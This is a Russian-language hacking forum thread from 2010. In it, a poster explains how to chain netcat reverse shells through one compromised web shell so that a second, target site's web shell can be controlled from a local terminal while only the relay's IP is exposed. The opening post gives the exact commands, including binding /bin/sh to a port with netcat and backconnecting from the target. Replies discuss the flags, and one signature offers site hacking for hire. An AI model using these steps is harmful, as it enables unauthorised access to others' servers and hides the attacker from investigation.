ANTICHAT.RU    VIDEO.ANTICHAT.RU    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  

???????? RU ?????? ? RU ??????? ? ????? ???????. ? ??? ?????? ????!



ViKing – ?????? ????????? ??? ??????? ????????? ????? ?????????!

Вернуться   ????? ??????? > ???? > ?????? > ????????? ??????
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Backconnect через другой шелл
  #1  
Старый 30.04.2010, 21:03
Аватара для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщения: 2,841
Провел на форуме:
3 месяца 2 недели 2 дня

Репутация: 414 ±



Отправить сообщение для  Pashkela с помощью ICQ
По умолчанию Backconnect через другой шелл

Не то, чтобы статья, так, мысли вслух, подтвержденные практикой, может кому полезно будет.

Итак известно, что бекконект с шелла делается на дедик, сейчас рассмотрим тоже самое, только в роли дедика выступит обычный веб-шел.

Даны примерные данные, для наглядности, все испытания проводились на Ubuntu 9.10 в терминале. Итак исходные:

1. Есть веб-шелл (наш, давнишний, "левый", может порутаный, может нет, хотим использовать) - условно ВШ1
2. Есть веб-шелл на целевом сайте (другом, не пункт 1) - т.е. тот, что мы хотим порутать к примеру - условно ВШ2
3. Есть терминал (локальный) - условно ТЛ
4. И есть такая прога netcat

Задача: сделать бекконект с ВШ2 на ВШ1 и чтобы мы могли рулить в итоге ВШ2 через терминал (ЛОКАЛЬНО) паля только IP ВШ1. Допустим ВШ1 имеет IP 84.177.33.78

Последовательность действий:

1. nc -l -p 31340 -nvv -e /bin/sh & - набираем в консоли ВШ1
2. nc -nvv 84.177.33.78 31340 - набираем в ТЛ
3. Набираем в ТЛ "uname -a" - видим данные ВШ1
4. nc -l -p 31337 -t - набираем в ТЛ после того, как подключились к ВШ1
5. на ВШ2 делаем бекконект любым доступным способом (хоть из встроенного функционала шелла wso, либо отдельный перл-скриптом) указывая IP ВШ1 и порт 31337
6. 3. Набираем в ТЛ "uname -a" - видим данные ВШ2

Всё. Мы сидим в удобном любимом домашнем терминале(с нашими красивыми настройками и etc.) и лазием по ВШ2 через ВШ1.

PS: Ничто нам не мешает сделать цепочку таких бекконектов, лишь бы портов хватало свободных. Сорри, если где-то было и повтор

Последний раз редактировалось Pashkela, 30.04.2010 в 21:16.
 
Ответить с цитированием

  #2  
Старый 01.05.2010, 02:06
Аватара для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщения: 1,189
Провел на форуме:
2 месяца 6 дней

Репутация: 196 ±



Отправить сообщение для  Nightmarе с помощью ICQ
По умолчанию

Действительно, не поверишь, но именно сегодня я задавался этим вопросом как такое реализовать, хотя мне надо было сделать туннель через 3 компостера Windows, но пологаю что всё так оно и будет.
А смысл статьи я так понимаю сводится к малоизвестному параметру нетката как -t означающего туннель, вот это как говорится даже не расчитывал.
Теперь учтём, за статейку спасибо, на днях опробую сие чудо под виндой.

PS: заодно расшифруйте аргумент -nvv для чего он нужен.

Последний раз редактировалось Nightmarе, 01.05.2010 в 02:08.
 
Ответить с цитированием

  #3  
Старый 01.05.2010, 12:46
Аватара для nemaniak
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщения: 201
Провел на форуме:
1 неделю 6 дней

Репутация: 16 ±

По умолчанию

Довольно интересная статья... Сам не раз задумывался над тем как такое реализовать, никак руки не доходили до практики. Автору рескепт
Также интересует параметр nvv, что он определяет?
 
Ответить с цитированием

  #4  
Старый 01.05.2010, 13:29
Аватара для diehard
diehard
Постоянный
Регистрация: 30.09.2007
Сообщения: 815
Провел на форуме:
4 недели 1 день

Репутация: 55 ±



Отправить сообщение для  diehard с помощью ICQ
По умолчанию

Действительно, не поверишь, Довольно интересная статья... именно сегодня Сам не раз задумывался
Также интересует аргумент -nvv для чего он определяет?
 
Ответить с цитированием

  #5  
Старый 01.05.2010, 13:39
Аватара для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщения: 1,268
Провел на форуме:
3 месяца 3 недели 5 дней

Репутация: 973 ±



По умолчанию

Пашке - спасибо КЭП!
Остальным -
Код:
Options:
  -c, --close                close connection on EOF from stdin
  -e, --exec=PROGRAM         program to exec after connect
  -g, --gateway=LIST         source-routing hop point[s], up to 8
  -G, --pointer=NUM          source-routing pointer: 4, 8, 12, ...
  -h, --help                 display this help and exit
  -i, --interval=SECS        delay interval for lines sent, ports scanned
  -l, --listen               listen mode, for inbound connects
  -L, --tunnel=ADDRESS:PORT  forward local port to remote address
  -n, --dont-resolve         numeric-only IP addresses, no DNS
  -o, --output=FILE          output hexdump traffic to FILE (implies -x)
  -p, --local-port=NUM       local port number
  -r, --randomize            randomize local and remote ports
  -s, --source=ADDRESS       local source address (ip or hostname)
  -t, --tcp                  TCP mode (default)
  -T, --telnet               answer using TELNET negotiation
  -u, --udp                  UDP mode
  -v, --verbose              verbose (use twice to be more verbose)
  -V, --version              output version information and exit
  -x, --hexdump              hexdump incoming and outgoing traffic
  -w, --wait=SECS            timeout for connects and final net reads
  -z, --zero                 zero-I/O mode (used for scanning)
__________________

"A" | Грязью не занимаюсь | X-Byte Torrent Tracker | Взлом сайтов на заказ

Последний раз редактировалось BlackSun, 01.05.2010 в 13:43.
 
Ответить с цитированием

  #6  
Старый 01.05.2010, 15:54
Аватара для shellz[21h]
shellz[21h]
Постоянный
Регистрация: 20.12.2007
Сообщения: 334
Провел на форуме:
3 недели 1 день

Репутация: 16 ±

Отправить сообщение для  shellz[21h] с помощью ICQ
По умолчанию

Цитата:
Также интересует аргумент -nvv для чего он определяет?

BlackSun же выложил список опций, читать не умеем?))
 
Ответить с цитированием

  #7  
Старый 01.05.2010, 23:49
Аватара для life_glider
life_glider
Познающий
Регистрация: 13.04.2010
Сообщения: 42
Провел на форуме:
5 дней 8 часов 2 минуты

Репутация: 9 ±

По умолчанию

http://forum.antichat.ru/printthread.php?t=151993
вроде в этой статье вкратце говорится про коннект через другой хост
 
Ответить с цитированием
Ответ


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Отправлю смс по вашим коротким номерам от 20 р за смс goldaid Мобильная связь, СМС - Покупка, продажа 75 31.05.2010 19:36
Используем сплоит под ipb 2.3.5 и заливаем шелл через админку ReanimatoR Video.Antichat 4 03.04.2010 08:43
Подскажите как залить архив с дором через шелл, если есть ограничение на рамер файла? catsanek PHP, PERL, MySQL, JavaScript 4 22.11.2009 01:25
Залить шелл через http запрос serg™ Уязвимости 5 05.12.2006 17:27



Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра


Быстрый переход

plohihzagrusok.net


Powered by: vBulletin Version 3.0.x
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.

ANTICHAT.RU